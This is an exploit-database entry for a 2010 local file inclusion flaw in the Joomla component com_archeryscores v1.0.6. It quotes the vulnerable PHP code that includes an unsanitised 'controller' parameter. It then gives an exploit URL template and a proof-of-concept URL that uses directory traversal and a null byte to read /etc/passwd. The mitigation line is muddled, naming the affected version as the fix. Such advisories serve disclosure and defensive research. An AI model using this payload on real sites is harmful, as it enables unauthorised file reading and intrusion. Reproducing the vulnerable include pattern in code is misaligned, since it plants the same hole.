header-logo
Suggest Exploit
vendor:
Joomla Component Archery Scores (com_archeryscores)
by:
wishnusakti + inc0mp13te (HH)
8,8
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: Joomla Component Archery Scores (com_archeryscores)
Affected Version From: v1.0.6
Affected Version To: v1.0.6
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component Archery Scores (com_archeryscores) v1.0.6. An attacker can exploit this vulnerability to include arbitrary files from the web server and execute arbitrary code. This is achieved by passing a maliciously crafted 'controller' parameter to the vulnerable 'index.php' script.

Mitigation:

Upgrade to the latest version of Joomla Component Archery Scores (com_archeryscores) v1.0.6 or later.
Source

Exploit-DB raw data:

 ================================================================================================

 Title    : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
 Vendor   : http://lispeltuut.org/
 Download : http://lispeltuut.org/archery-scores/download

 Date     : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com

 ================================================================================================

 [+] Vulnerable

     ./components/com_archeryscores/archeryscores.php

     Line 22: if($controller = JRequest::getVar('controller')) {
     Line 23:	require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
     Line 24: }

 [+] Exploit

     http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00

 ================================================================================================

 Greetz to:

     Penghuni #nob0dy priv8 Server
     (ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, madonk, & Bot² Scan :D)
     en Semua Komunitas Hacking Tanah Air
     Peace Yo :)

 ================================================================================================

# ./wishnusakti